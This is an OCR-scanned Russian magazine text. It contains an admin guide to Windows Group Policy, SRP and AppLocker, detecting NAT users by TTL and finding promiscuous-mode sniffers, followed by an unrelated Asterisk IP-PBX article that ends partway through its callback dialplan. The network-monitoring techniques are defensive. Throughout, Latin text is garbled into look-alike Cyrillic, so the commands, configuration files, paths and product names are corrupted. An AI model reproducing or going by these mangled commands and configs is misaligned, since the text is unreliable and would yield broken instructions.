антивирусы и брандмауэры, клиентские системы начинают кишить ви- 
русами, троянами, малварью и левыми программами, периодически 
вызывающими сбои в работе ѴѴіп б оѵѵз. Да и начальствотребуетубрать 
лишнее с компов (игры, чаты, обучалки), контролировать использование 
трафика и установитьзапрет на подключение флешек. Естественно, хло- 
поты по разруливанию ситуаций ложатся на плечи админа. 



ГРУППОВЫЕ ПОЛИТИКИ Групповые полити- 
ки (СРО) — удобный и функциональный инс- 
трумент, позволяющий управлять настрой- 
ками безопасности ѴѴіпсІоѵѵз. С его помощью 
можно настроить достаточно много пара- 
метров ОС. К сожалению, большая их часть 
скудно описана в литературе, и начинающие 
админы часто даже не знают о том, какой 
потенциал у них в руках. К тому же, группо- 
вые политики постоянно развиваются, и в 
новых версиях ОС (а также сервис-паках) СРО 
получают новые функции. Узнать различия и 
доступные параметры довольно просто, — 
скачай с сайта МісгозоЛ список «Сгоир Роіісу 
5етп§8 Кебегепсе» для используемой опера- 
ционки. 

В ѴѴіп2к8 управление СРО осуществля- 
ется при помощи консоли Сгоир Роіісу 
Мапа^етепі: Сопзоіе (СРМС.тзс) 2.0. Уста- 
новки безопасности производятся в ветке 
«Конфигурация компьютера — Конфигура- 
ция ѴѴіпсІоѵѵз — Параметры безопасности» 
(Сотрщег СопЯ^игагіоп — ѴѴіпсІоѵѵз 5етп§$ — 
Зесигпу Зетп^з) . Здесь довольно много 
настроек, при помощи которых можно опре- 
делить политики паролей, задать блокировки 
учетной записи, назначить права доступа, 
установить порядок аудита, политики реест- 
ра, файловой системы, ИАР, ІР-безопасности 
и многое другое. Разберем самые интересные 
из них. 
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Выбираем в консоли группу политик «На- 
значение прав пользователя». Политика 
«Архивация файлов и каталогов» позволяет 
игнорировать разрешения файлов при опера- 
циях резервного копирования. Следует четко 
определиться, кто будет входить в такую 
группу, так как права на создание резервных 
копий, предоставленные кому попало, могут 
привести к утечке корпоративных данных. 
Политика «Загрузка и выгрузка драйверов 
устройств» (Ьоасі апб Шіоасі Пеѵісе) позволя- 
ет устанавливать драйвера после настройки 
системы; здесь лучше оставить в списке толь- 
ко администраторов, чтобы пользователи не 
могли самостоятельно подключать сторонние 
девайсы. Разрешив «Отладку программ», мы 
предоставим пользователю возможность 
подключать отладчик к любому процессу или 
ядру, а ты сам понимаешь, какой это риск. По 
умолчанию сюда входит только группа адми- 
нистраторов, но в организациях, занимаю- 
щихся разработкой ПО, хочешь не хочешь, а 
такое право давать придется. Соответствен- 
но, нужно отслеживать легитимность его 
применения. 

Особое внимание удели политикам в группе 
«Параметры безопасности», где много 
полезных пунктов. Например, мы можем: 
отключить возможность анонимного доступа 
к сетевым ресурсам, переименовать учетную 
запись гостя (если такая используется и 



необходима) . В политиках, начинающихся с 
«Устройства», одним щелчком мышки можно 
заблокировать возможность подключения и 
форматирования сменных устройств, дискет, 
компакт дисков и внешних хардов. Впервые 
политики блокировки сменных устройств 
появились в ѴізШ и ѴѴіп2к8. Ранее для этих 
целей приходилось использовать программы 
сторонних разработчиков вроде ПеѵісеЬоск. 

В этой же вкладке разрешаем или запрещаем 
подключение принтера выбранной группе 
пользователей. 

ПОЛИТИКИ ОГРАНИЧЕННОГО ИСПОЛЬЗО- 
ВАНИЯ ПРОГРАММ Одной из самых важных в 
контексте статьи будет группа объектов СРО 
«Политики ограниченного использования 
программ» (Зобиѵѵаге Кезітісгіоп Роіісіез, 5КР) . 
Здесь настраиваются ограничения запуска 
приложений на компьютерах, начиная с 
ѴѴіпХР и выше. Принцип настроек совпадает с 
настройками правил файрвола: администра- 
тор указывает список приложений, которые 
разрешено запускать на системах организа- 
ции, а для остальных ставит запрет. Или пос- 
тупает наоборот: разрешает все, а затем по 
мере необходимости блокирует, что не нужно. 
Здесь каждый админ выбирает, как ему удоб- 
нее. Рекомендуется создать отдельный объект 
СРО для 5КР, чтобы всегда была возможность 
откатить изменения при необходимости или 
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возникновении проблем с запуском нужных приложений. 

По умолчанию 5КР отключены. Чтобы их активировать, следует 
перейти во вкладку «Политики ограниченного использования про- 
грамм» (в «Конфигурация компьютера» и «Конфигурация пользо- 
вателя» есть свои пункты) и выбрать в контекстном меню «Создать 
политику ограниченного использования программ» (Ыеѵѵ ЗоКѵѵаге 
Кезтсйоп Роіісіез) . По умолчанию установлен уровень безопасности 
«Неограниченный» (Шгезігісііесі), то есть доступ программ к ресурсам 
определяется Г\ПГЕ5 правами пользователя. Разрешен запуск любых 
приложений, кроме указанных как запрещенные. Чтобы изме- 
нить уровень, нужно перейти в подпапку «Уровни безопасности», 
где находятся пункты активации еще двух политик - «Запрещено» 
(Бізаііоѵѵесі), при которой возникает отказ в запуске любых приложе- 
ний, кроме явно разрешенных админом. А политика «Обычный поль- 
зователь» (Вазіс ІІзег), появившаяся в СРО, начиная с Ѵізт, позволяет 
задать программы, которые будут обращаться к ресурсам с правами 
обычного пользователя, вне зависимости от того, кто их запустил. 

В организации с повышенными требованиями информационной бе- 
зопасности лучше самому определить список разрешенных программ, 
поэтому дважды щелкаем по «Запрещено» и в появившемся окне 
нажимаем кнопку «Установить по умолчанию» (Зет аз БеГаиК) . Инфор- 
мация в появившемся окне сообщит, что выбранный уровень — 
более строгий, и некоторые программы могут не работать после его 
активации. Подтверждаем изменения. Теперь переходим в подпапку 
«Дополнительные правила». После активации 5КР создаются две по- 
литики, перекрывающие правила по умолчанию и описывающие ис- 
ключения для каталогов %5узі;етКооі:% и %Рго§гатРі1езПіг%. Причем 
по умолчанию политики для них установлены в «Неограниченный». 

То есть после активации политики «Запрещено» системные програм- 
мы будут запускаться в любом случае. В контекстном меню для тонкой 
настройки политик предлагается 4 пункта. С их помощью можно 
указать: правило для пути (путь к каталогу, файлу или ветке реестра), 
зоны сети (интернет, доверенная сеть и так далее), хеш (указываем от- 
дельный файл, по которому генерируется хеш, позволяющий опреде- 
лить его однозначно, вне зависимости от пути) и сертификат издателя 
(например, Місгозоіт, АбоЪе и т.п.) . При этом отдельная политика име- 
ет свой уровень безопасности, и легко можно запретить выполнение 
всех файлов из каталога, разрешив запуск только отдельных. Правила 
для хеша имеют приоритет перед остальными и наиболее универсаль- 



ны. Правда, с учетом того, что хеш некоторых системных приложений 
(того же Блокнота) будет отличаться в разных версиях ОС, к процессу 
генерирования хеша лучше подойти внимательно. 

Если щелкнуть по ярлыку «Политики ограниченного использования 
программ», получим доступ еще к трем настройкам. Выбор политики 
«Применение» (ЕпГогсетет) откроет диалоговое окно, в котором 
указываем, применять ли 5КР для всех файлов или исключить ОБЬ 
(по умолчанию) . Учитывая количество ПІХ'ок в системе, активация 
контроля всех файлов потребует дополнительных ресурсов, поэто- 
му кастомный вариант выбираем, только когда это действительно 
необходимо. По умолчанию политики актуальны для всех пользова- 
телей без исключения, но в настройках предлагается снять контроль 
за деятельностью локальных админов. В третьем поле активируется 
поддержка правил сертификатов. Такие политики также замедляют 
работу системы и по умолчанию отключены. 

С помощью политики «Назначенные типы файлов» определяются 
типы файлов, которые считаются исполняемыми. В списке уже есть 
все популярные расширения, но если используется что-то свое, 
добавляем его /их в перечень. И, наконец, в «Доверенные издатели» 
задаем тех, кто может (пользователь и/или админ) добавить подпи- 
санное доверенным сертификатом приложение, а также определять 
подлинность сертификата. Для максимальной безопасности разреши 
добавлять приложения только админам доменного уровня. 

АРР1_0СКЕКЗа несколько лет существования технология 5КР так 
и не смогла завоевать популярность, ведь, как ты мог убедиться из 
предыдущего раздела, точно настроить политики — не такая уж и 
простая задача. Максимум, на что обычно хватало админа, — запрет 
отдельных прог и игрушек. В \Уіп7/ѴѴіп2к8К2 было представлено 
логическое продолжение 5КР — АррБоскег. Впрочем, сам 5КР никуда 
не делся, оставлен в целях совместимости. В отличие от 5КР, Арріоскег 
работает не в пользовательском окружении, а в системном: устанав- 
ливаемые политики более эффективны. 

Настройки АррБоскег находятся во вкладке Зесигку Зетп^з (зесроі. 
тзс) — Арріісагіоп Сошгоі Роіісіез. Если раскрыть дерево, то увидим 
три подпункта, в которых настраиваются политики в соответствии с 
типами файлов: 

• ЕхестаЫе Киіез — правила для файлов с расширением ехе, сот и зге; 

• ѴѴіпсіоѵѵз Іпзіаііег Киіез — правила для тзі и тзр файлов; 
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НАСТРАИВАЕМ ГРУППОВЫЕ ПОЛИТИКИ 




> іпіо 

О том, как блокировать 
ІМ.Зкуре, Р2Р читай 
в статье «Серпом по 
аськам», в августовс- 
ком номере т за 2009 
год. 



ЗсгіргКиІез — правила для ЪаЦ стсІДз, рзі иѵЪз скриптов. 
По умолчанию используется политика ЭеГаик, работа 
которой основывается на установке СРО. Но для каждого 
типа правил можно выбрать еще одну из двух политик: 

• ЕпГогсесІ — политики активны, и все, что не описано в 
правилах, блокируется; 

• АибК Опіу — режим аудита; все события, для которых 
созданы правила, вместо блокировки заносятся в журнал. 
Полезен при знакомстве и первоначальной отладке рабо- 
ты АррЬоскег. 

Для активации нужного варианта переходим во вкладку 
«ЕпГогсетеш» окна свойств АррЬоскег. Перейдя в 
«Абѵапсесі» и установив флажок «ЕпаЫе ЭІХ гиіе 
соііесгіоп», можно активировать проверку ЭІХ. Как и 
в случае с 5КР, проверка потребует дополнительных 
системных ресурсов. По умолчанию правил нет, поэтому 
ограничения на запуск программ не накладываются (кро- 
ме прав ]\ПГР5, естественно), и в отличие от 5КР, рулесеты 
нужно создать самому. Этот процесс в АррЬоскег выглядит 
несколько проще. Контекстное меню предлагает для этого 
три варианта: 

• Сгеаге Ыеѵѵ Киіе — при помощи визарда создаются прави- 
ла для издателя (РиЫізЬег), пути (Рагіі, каталог или файл) 
и хеша (Еііе НазЬ) ; 

• Аіпотагісаііу ^епегаге Киіез — здесь просто указываем 
на каталог, в котором находятся установленные проги, и 
мастер автоматически создает правила (РагЬ/НазЬ) для 
всех исполняемых файлов внутри; 

• Сгеаге ЭеГаик Киіез — создается набор правил по умол- 
чанию. 



ИЗМЕНЯЕМ УРОВЕНЬ БЕЗОПАСНОСТИ 
ПОЛИТИКИ ОГРАНИЧЕННОГО ИСПОЛЬЗО- 
ВАНИЯ ПРОГРАММ 

При выборе последнего пункта будут созданы раз- 
решающие правила для запуска приложений из 
каталогов ѴѴіпсіоѵѵз (%\У1НБ1К%) и Рго^гат Еііез 
(%РКОСКАМЕІЕЕ5%); пользователи, входящие в группу 
локальных администраторов (ВШЕТІПХАбтіпізГгаГог), 
ограничений по запуску не имеют. После того как первые 
правила в категории сформированы и выбран вариант 
ЕпГогсесІ, запуск приложений возможен только в том 
случае, если он разрешен политикой. В последующем 
корректируем имеющиеся правила и создаем новые. 
Чтобы отредактировать правило, вызываем его свойства 
и меняем: учетные записи и группы, которые попадают 
под политику, путь к каталогу или файлу, действие (Асгіоп) 
блокировать или разрешить. Использование учетных 
записей и групп в правилах АррЬоскег группы достаточно 
удобно, так как можно создать группу пользователей, 
которым разрешен запуск офисных приложений, группу 
«интернетчиков» и так далее, и затем включать в них отде- 
льных пользователей. 

Настройки во вкладке Ехсергіопз позволяют задать 
исключения для отдельных объектов. Нажав кнопку АсМ, 
указываем отдельный файл, хеш или издателя, которые не 
будут подпадать под действие редактируемой политики. 
Так можно достаточно тонко указать разрешения для боль- 
шого количества файлов. 

Да, и как ты, наверное, заметил, возможность настройки 
правила для зоны сети в АррЬоскег отсутствует. 

После доводки ЭебаиК Киіез приступаем к созданию 
индивидуальных политик. Для чего выбором СгеаЩ Ыеш 
Киіе запускаем мастер и в пошаговом режиме производим 
нужные настройки. Первое окно пропускаем, во втором 
задаем действие АПоѵѵ/Эепу и указываем пользователя 
или группу, для которых будет действовать политика. 
Далее выбираем тип политики РиЫізЬег/Раик/ЕіІе Назк 
и, в зависимости от произведенного выбора, отмечаем 




ПРОГРАММА РР0МІ5САЫ ПОЗВОЛЯЕТ ОПРЕДЕЛИТЬ НАЛИЧИЕ В СЕТИ СНИФЕРОВ 
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РЕДАКТИРОВАНИЕТИПОВФАЙЛОВ, КОТО- 
РЫЕ 5РР СЧИТАЕТ ИСПОЛНЯЕМЫМИ 



объект. При определении пути АррЬоскег использует 
переменные. То есть, если указать в Проводнике С:\ 

50ІТ, путь будет преобразован к виду %05Пгіѵе%\5оЛ\'' . 
Кроме того, возможны такие переменные: %ѴѴІППІК%, 
%5У5ТЕМ32%, %РКОСКАМРІЬЕ5%, %КЕМОѴАВЬЕ% (СВ/ 
БУЛ) и %НОТ% (ИЗВ-устройства) . Причем особо отме- 
чается, что это внутренние переменные АррЬоскег, а не 
системные, хотя некоторые названия совпадают. 
Политики созданы, но чтобы они применялись, нужно 
запустить службу Арріісагіоп Иепгііу (АррГОЗѵс) . Делается 
это через консоль Зегѵісез (зегѵісез.тзс) или в редакторе 
групповых политик (Зесигіиу Зетп^з Зузіет Зегѵісез) . 
После изменений обновляем политики: 

> дрирсіаке /Іогсе 

Еще один метод контроля за установленным ПО и под- 
ключенными девайсами — использование специальных 
программ инвентаризации (например, 5ССМ, о кото- 
ром говорилось в статьях «Начальник сети» и «Оружие 
массового управления», опубликованных соответственно 
в августовском и сентябрьском номерах ц за 2009 год) . 
Также не забываем о службе «Управление приложениями» 
(АррМ^тО, отключив которую, мы блокируем возмож- 
ность установки ПО. 

БОРЬБА С N АТ'ОМ С «халявным» интернетом на работе у 
многих пользователей появляется соблазн использовать 
его в своих целях. Конечно, времена, когда к системному 
блоку подключался модем и через него выходили в интер- 
нет, практически канули в лету (для некоторых провин- 
циальных городов это все еще актуально), но менеджеры 
порой берут работу на дом, а доступ к нужной инфе 
пытаются получить посредством диалапа. Если же офис 
находится в жилом доме, то сотрудники-энтузиасты могут 
развернуть ѴѴіЕі и раздавать соседям трафик. В любом слу- 
чае халява привлекает любителей, и остается удивляться, 
как народ на выдумки горазд. Кроме сворованного трафи- 
ка, пользователь ставит под удар безопасность всей сети, 
ведь через такой черный ход запросто могут проникнуть 
вирусы, троянцы и прочая зараза (+ может быть похище- 
на конфиденциальная информация) . 

Методов обнаружения работы клиентов из-за ЫАТ 
предостаточно — контроль ТТЬ, анализ идентификатора 
ІР-пакета и диапазона ТСР/ІЮР портов и так далее (под- 
робнее о методах обнаружения ЫАТ читай в статье Криса 
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НАСТРАИВАЕМ ФИЛ ЬТР ДЛЯ КОНТРОЛЯ ТТІ. В ѴШЕ5НАКК 



«Охота на сетевых партизан» в т #111). Мы же разберем 
практическую реализацию. Инструментом номер один 
здесь является ѴѴігезЬагк ( ѵѵігезЬагк.ог^) — мультиплат- 
форменный (ѴѴіпсІоѵѵз, Ілпих, хВ5И, Зоіагіз, Мае ОЗХит.д.) 
снифер и анализатор в одном флаконе. Возможность ис- 
пользования фильтров и сортировки делает эту програм- 
му весьма удобной для решения многих задач: контроль 
определенного типа трафика (аська, сетевые игры, проги 
для удаленного доступа и так далее) , поиск проблем в сети 
и анализ безопасности. 

Для определения работы из-за ИАТ нас интересует 
возможность контроля ТТЬ (время жизни) ІР-пакета. 
Нужно учитывать, что каждая ОС и версии используют 
свое значение ТТЬ, например, все версии ѴѴіпсІоѵѵз — 128, 
Ілпих — 64 (максимально 255), а при прохождении пакета 
на каждом роутере отнимается единица. То есть, если 
получаем пакет с ТТЬ 63 или 127 (или меньше), это может 
свидетельствовать о наличии ЫАТ (виртуальные машины 
также работают из-за ЫАТ) . Открываем список фильтров 
и в «ІР опіу» устанавливаем значение поля ір.йі в отлов 
всех пакетов, ТТЬ которых меньше 64 или 128. Программа 
имеет достаточный набор для анализа, поэтому можно 
захватить трафик с минимальными ограничениями, а 
затем просмотреть, что попалось в сети, и в последующем 
уточнять настройки фильтров. 

Кроме графического интерфейса, возможен запуск 
ѴѴігезЬагк в командой строке. Смотрим список сетевых 
интерфейсов по команде «ізЬагк -Б», а затем вылавливаем 
значение поля ТТЬ в проходящих пакетах. 

> ЦзЬагк -і 1 -е ір.ккі -Тііеісіз 

Поддерживаются іербитр-подобные правила, поэтому 
можно просто считать значения нужного поля ІР (ір [8] < 
64, поле ТТЬ находится в 8-м байте ІР-заголовка) . 

Хорошей альтернативой ѴѴігезЬагк является ВѴѴМеіег 
( безкзоІі.сот/ВѴѴМеЕег.Ьші) . совмещающий в себе 
функции файрвола и монитора трафика, с возможностью 
построения различного рода графиков. Система фильтров 
позволяет задать любое правило и затем отслеживать все 
пакеты, которые под него попадают. 

К этому списку можно добавить практически все файрво- 
лы, что встретишь в корпоративной сети: Кегіо ѴѴіпКоиіе 
(подробнее о нем читай в статье «Марш-бросок в большую 
сеть», опубликованной в сентябрьском номере ц-с за 2007 
год), ІІзегСаіе Рюху & Еігеѵѵаіі («Привратник для локаль- 
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> Ііпкз 

• Страница ТесЫХІеІ, 
посвященная 
групповым поли- 
тикам — ІесЬпеС 
тісгозой.сот/еп- 
из/ѵѵіпсіоѵѵззегѵег/ 
дгоирроіісѵ . 

• Сайт ѴѴігезЬагк — 
ѵѵігезЬагк.огд . 

• Сайт ВѴѴМеІег — 
сіезкзой.сот/ 
ВѴѴМеІег.Ыт . 

• Утилита ргоОЕТЕСТ — 
зЕпеі/рго]есІз/ 
ргобеіеск 

• Сайт РготіВсап — 
зесигіМпбау.сот/ 
ргосіисіз/ргоппізсап. 
Щті. 
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РКОМСЖѴ — «АНТИСНИФЕР» ОТ МІСК050РТ 



ной сети», июльский за 2009 год), І5А 
Зегѵег/Рогейгопі: ТМС («Форпост для защиты 
периметра», ноябрьский ц: за 2009 год) и дру- 
гие, которые также имеют все необходимое 
для анализа и блокировки трафика. 

Кроме того, не забываем производить пери- 
одическое сканирование сети при помощи 
№пар Гптар.ог^) и сравнивать результаты 
с отчетами ранее произведенных сканов. 

В случае обнаружения изменений в списке 
открытых портов производим расследование. 
Это позволит обнаружить лазейки, оставлен- 
ные троянцами, прокси-серверы, некоторые 
запущенные игры и так далее. 

ОБНАРУЖИВАЕМ СНИФЕРЫ В любой ЦШ 
найдется парочка умников, которые захотят 
знать больше, чем им положено. Любопытный 
кекс запускает снифер в надежде поймать 
пароль, если не админа, то любого другого 
пользователя, или почитать инфу, ему не 
предназначенную. Для перехвата всех пакетов 
сетевая карта переводится в неразборчивый 
режим (рготізсіюиз тобе), обнаружить 
который можно как локально, так и удаленно. 
В первом случае регистрируемся в системе и 
просматриваем настройки интерфейсов, во 
втором — актуальны два способа: 

• мониторинг ресурсов на всех хостах сети — 
при переводе №С в рготізсіюиз тобе возрас- 
тает нагрузка, так как ядру приходится обра- 
батывать большее количество информации. 



быстро заполняется место на харде; 

• ошибки в реализации — сетевой интерфейс 
должен «забирать» только свои пакеты; так 
и настроены ОС, но поскольку теперь ядро 
получает инфу обо всех пакетах, можно поп- 
робовать послать АКР-пакет с правильным ІР 
или именем, но неправильным МАС-адресом. 
В последнем случае система может ответить 
на неправильный пакет. Добавляем заведомо 
неверные данные в АКР-таблицу и пингуем 
«подозрительный» хост: 

> агр -з ЬаскегЬозЬ 

00 : 11 : 22 : 33 : 44:55 

> ріпд каскегкозк 

Если ответ получен, значит, с большой 
долей вероятности можно сказать, что узел 
находится в режиме прослушивания. Не за- 
бываем удалить неправильную запись после 
проверки: 

> агр -б каскегЬозк 

Удобнее для выявления нарушителей исполь- 
зовать специальные утилиты. Например, 
ргоЭЕТЕСТ ( зРпеЕ/ргоіесщ/ргобеііесі:) . ко- 
торая, правда, уже несколько лет не обнов- 
лялась, поэтому грешит багами. Настройки 
позволяют задать список узлов и указать 
периодичность их проверки. Отчет отправля- 
ется на е-таіі. 



Еще одна прога — РготіЗсап Г зесигіііѵЫбаѵ. 
сот/ргобисщ/рготізсап.іпіті) — также 
позволяет задать диапазон ІР и провести ряд 
тестов. Если будет обнаружен хост, прослу- 
шивающий сеть, админ получит визуальное 
предупреждение. Предусмотрена возмож- 
ность выполнения внешней команды. 

Кстати, Місгозоіт также предлагает свой 
вариант решения проблемы — утилиты 
Ргопщгу и РгопщгуІЛ, скачать которые 
можно с офсайта Г зиррогЕтісгозоіі.сот/ 
кЪ/892853) . Первая командная, вторая — с 
СІЛ. Принцип прост: указываем ІР-адрес 
отдельной машины или диапазон и жмем 
«Зіагі: Оиегу». 

Д И КТАТУ РА АДМИНА После произведенных 
настроек мы получим полностью контро- 
лируемую сеть, в которой будут использо- 
ваться только разрешенные программы, 
а пользователи не будут отвлекаться от рабо- 
ты. Также не забываем о записях системы 
аудита, в которых будет присутствовать ин- 
формация о переводе сетевого интерфейса в 
пассивный режим или установке программ. 
Конечно, это не все варианты установления 
«диктатуры» админа в ЬАЫ; добавим сюда 
отключение пользователя от интернета при 
превышении лимита, шейпинг трафика, 
контроль МАС- и ІР-адресов, блокировку 
мессенджеров, фильтрацию ІЖЬ и контента 
и многое другое, □с 
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КАК СЭКОНОМИТЬ И ЗАРАБОТАТЬ С ПОМОЩЬЮ А5ТЕВІ5К 



Кризис заставляет нас потуже затянуть пояса и по-новому взглянуть на 
многие вещи. Ситуация в ІТ-сфере сходная: чтобы сэкономить, органи- 
зации перепланируют использование имеющихся ресурсов, делая став- 
ку на объединение функциональных возможностей, серверов и сетей. 
Рассмотрим, какс помощью ІР-РВХ Азіегізк можно сократить расходы 
компании на телефонную связь и даже немного заработать самому. 



ТОНКОЕ СОПРЯЖЕНИЕУ средней и, тем 
более, крупной организации часто есть фили- 
алы в разных городах или странах. Если в уда- 
ленных офисах существует возможность воз- 
двигнуть ІР-РВХ сервера на базе Азіегізк, то 
почему не объединить их в единую сеть? Этим 
мы убьем сразу нескольких зайцев: сведем 
на нет стоимость звонков между «точками», 
обеспечим безопасное голосовое соедине- 
ние (путем применения ІРзес-шифрования 
к потоку голосовых данных) , создадим все 
условия для проведения аудио- и видеоконфе- 
ренций. А также получим все дополнительные 
телефонные свойства, присущие ѴоІР: запись 
телефонных разговоров, ІѴК (система предва- 
рительно записанных голосовых сообщений, 
выполняющая функцию маршрутизации 
звонков внутри саіі-центра), альтернатив- 
ный С5М-роуминг и т.д. Продемонстрировав 
начальству выгоду от внедрения подобного 
решения, можно в корне изменить отношение 
к ІТ-подразделению (сотрудников которого 
зачастую считают вечными нахлебниками) и 
получить щедрые премиальные. 

Итак, у нас есть два сервера Азіегізк. Давай 
организуем совместную работу, объединив 
их диалпланы и увеличив возможности. 
Подружить два Азіегізк'а можно по про- 
токолу установления сессии 5ІР (Зеззіоп 
Іппіаііоп Ргоіосоі, КРС 3263), либо по ІАХ2 
(Іпіег-Азіегізк еХсйап^е ргоіосоі, протокол 
обмена ѴоІР-данными между ІР-РВХ Азіегізк, 
КРС 5456) . Мы выберем второй вариант, 
так как ІАХ2 лучше адаптирован для работы 
из-за ПАТ. Он использует единственный 
порт (4569/ІГОР) для передачи сигнальных 



данных и медиапотока (т.е. меньше проблем 
с настройкой файеров на шлюзах и проблем 
с провами, которые любят резать подключе- 
ния по нестандартным портам) и поддержи- 
вает функцию объединения каналов. Эта 
способность позволяет отправлять голосо- 
вые данные множества вызовов под одним 
заголовком. Если между двумя офисами 
одновременно выполняются десятки звонков, 
выигрыш в пропускной способности за счет 
использования транка может быть значитель- 
ным. Помимо перечисленного, по сравнению 
с протоколом 5ІР, ІАХ2 позволяет прилично 
экономить сетевой трафик, так как сигналь- 
ная информация передается в битовых полях, 
а не текстом. 

Все необходимые настройки производятся 
в файле іах.сопР Один из серверов будет 
подключаться к другому для оперативного 
обмена данными. 

$ зисіо папо /еіс/азіегізк/іах.сопі 

; Подключаемся ко второму Азбепзк 
[депегаі ] 

; гедізкег => 

<изегпате> : <раззѵтогсІ>@<имя или ІР 
адрео 

гедізкег => изегВ : раз зѵ\гогс1@ зупаск . 
ги 

; Данные для подключения 

[ зупаск] 

іуре=І_гіепс1 

изег=изегпате 

зесгек=раззѵ\гогс1 

Ъ.озк = зупаск . ги 

сопкехк= зупаск 



Теперь необходимо добавить в диалплан 
описание нового маршрута: 

$ зисіо папо /еіс/азіегізк/ехіепзіопз.сопі 

[ зупаск] 

ехкеп => _5ХХХ , 1 , ЫоОр ( ) 
ехкеп => _5ХХХ,п,Біа1 (ІАХ2/ 
зупаск/ $ { ЕХТЕК } ) 
ехкеп => _5ХХХ , п , Напдир ( ) 

Вот, собственно, и все настройки на первом 
сервере. 

На другой стороне описание в іах.сопГ и на- 
стройки практически аналогичны. Учитывая, 
что этот сервер принимает подключение, 
убираем параметр ге^ізіег. 

$ зисіо папо /еіс/азіегізк/іах.соп^ 

[оббісе] 

куре=:Егіепс1 

изег=изег 

зесгек=раззѵ\гагс1 

Ь.озк=с1упатіс 

; В целях безопасности разрешим под- 
ключения только с нужного ІР-адреса 
бепу=0 . О . О . 0/0 
регшік=11 .22.33.44 
сопкехб=оббісе 

А в конфиге ехіеп5Іоп5.сопГ задаем второй пул 
номеров: 

ехбеп => _8ХХХ, 1, 

Біаі ( ІАХ2/оббісе/ 

$ { ЕХТЕЫ } ) 
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ЗУИ/АСК 



Если в подчинении несколько ІР-РВХ АзГегізк, то добавляем их также, 
как и первый сервер. 

Необходимый минимум для подключения выполнен. Далее нара- 
щиваем эту схему, изменяя диалплан в зависимости от ситуации и 
потребностей. Например, в экстеншенахАзііегізк можно указывать 
время действия правила. Чтобы звонить в удаленный офис можно 
было только в рабочее время, используем такую конструкцию: 



а11очл=дзт 

[ зірпеЕ] 

Еуре=:Е:гіепсІ 
изегпате=туизегпате 
з есгеЕ =тураз зчлгогсі 
са11егіс!=зірпеЕ 
1юз1с = зірпе1с . ги 



ехЕеп => 3000,1, СоЕоІІТіте (9:00-18:00 I топ- 
Ігі | * | * ?ОІІТ ,з,1) 

Вариантов действительно много, экспериментируй! 

ПОДКЛЮЧАЕМСЯ КБІР-ПРОВАЙДЕРУ За последние несколько 
лет 5ІР-провайдеров, предлагающих свои услуги по весьма де- 
мократичным ценам, наплодилось предостаточно. Используя их 
возможности, можно существенно сэкономить на междугородных и 
международных звонках. Для АзГегізк нет принципиальной разницы, 
подключаться к одному или нескольким 5ІР-провайдерам сразу, но 
для нас второй вариант подключения предпочтительнее, поскольку 
в диалплане можно предписать ранжирование операторов связи по 
каждому направлению на основе критерия «цена-качество». Можно 
звонить по разным направлениям, исходя из требуемого качества 
и установленных провайдерами расценок. Кстати, именно на этом 
подходе основана работа китов современного ЗІР'остроения вроде 
5ІрпеЕ.ги . 

Принцип настройки подключения и создания диалплана практически 
полностью совпадает с ІАХ2. Все установки для 5ІР производятся в 
файле зір.сопк 



паЪ=уез 

1готизег=зірпе1: 

1готсіотаіп=зірпе1: . ги 
сіііт Іто сіе = г 1 с 2 8 3 3 
іпзесиге=іпѵіЕе 
с опЕ ех Д = з і рп е Д 

Этот конфиг можно взять за основу для подключения к любому 5ІР- 
серверу. Конечно, разные провайдеры могут использовать специ- 
фические установки, поэтому придется прошерстить раздел РАО на 
офсайте поставщика сервиса в поисках примеров, нюансов и советов 
по обходу подводных камней. 

Далее разбираемся с входящими и исходящими звонками: 

$ зисіо папо /еіс/азіепзк/ехіепзіопз.соп* 

[ зірпеД-іп] 

ехДеп => 101 , 1 , ЗеД (САЬЬЕКІБ (паше) = " ЗірпеД саіі") 

ехДеп => 101 , п, Біаі (8ІР/101 , 2 0 ) 

ехДеп => 101 , п, РІауЬаск ( ѵтп-поЬосІуаѵаіІ ) 

ехДеп => 101 , п, Ѵоісетаіі (101) 

ехДеп => 101 , п, Напдир ( ) 



$ зисіо папо /еІс/азІегізк/зір.сопТ 

[депегаі] 

изегадепД=8ірРДюпе 

гедізДег=туизегпате :тураззѵ\гогсІ@ зірпеД .ги /2223322 

; Используемые кодеки 

с3.і за 1 ІОѴ7— аД. 

а11о™=и1ачл 

а11ом=а1ачл 
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[ зірпеД-оиД-тозсоѵ/] 

ехДеп => _749 [ 59 ] 2ХХХХХХ , 1 , ЗеД (САЬЬЕКІБ (аіі) ="8ірРІюп 
е" <2223322>) 

ехДеп => _749 [59] 2ХХХХХХ,п,Біа1 (ЗІР/зірпеД/$ {ЕХТЕЫ} ,20) 
ехДеп => _749 [59] 2ХХХХХХ,п, Напдир ( ) 

НАСТРАИВАЕМ САЬЬВАСК Сегодня не редкость, что менеджеры 
работают далеко за пределами офиса, связываясь при необходи- 
мости с руководством или работниками по мобильному. В итоге. 
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А2ВІШЫ6 ПРЕДОСТАВЛЯЕТ ШИРОКИЕ 
ВОЗМОЖНОСТИ П0УЧЕТУЗВ0НК0В 



в месяц за переговоры приходится платить доста- 
точно приличную сумму. А если таких сотрудников в 
офисе не один десяток? Затраты на переговоры будут 
значительны. Но выход есть: приобрести безлимит- 
ный пакет и при поступлении звонка перезванивать 
вызывающему, который далее уже сам выбирает, что 
ему нужно — звонить кому-нибудь в офисе, делать еще 
один исходящий звонок, например, междугородний, 
оставить или прослушать голосовое сообщение и т.д. 
При помощи Азгегізк организовать это достаточно 
просто, причем существует сразу несколько вариан- 
тов. Самый простой способ — создание в каталоге / 
ѵаг/ПЬ/а5і:егІ5к/оиі:§оіп§ специального .саіі-файла, 
который подхватывается и обрабатывается Азгегізк 
на лету. Создаем в ехгепзіопз.сопб описание нового 
диалплана: 

$ зисіо папо /еіс/азіегізк/ехіепзіопз.соггі 

[ ІпсошіпдСаІ 1 ] 

; Проверяем номер звонящего, если совпадает, 
запускаем скрипт 

ехбеп => 8,1, Собоіб ($ [ " $ {САЬЬЕКІБ (пшп) } " = 
"9151234567" ] ?са11Ьаск) 

; Аналогично описываются и остальные номера, на 
которые должен осуществляться перезвон 
ехбеп => з , п , Собо (погтаі ) ; Если номер в списке 
отсутствует, обрабатываем вызов обычным обра- 
зом 

ехбеп => з ,п (саІІЬаск) , Зузбет ( /ебс/азбегізк/ 
зсгірбз/саІІЪаск 8 $ { САЬЬЕКІБ ( пит) } &) 
ехбеп => з,п,Напдир() 
ехбеп => з,п(погша1) 

; Экстеншен, с которого будет производиться 
звонок 

[ ІпбегпаІСаІІ ] 

ехбеп => 123 , 1 , Біаі (5ІР/123 ) 
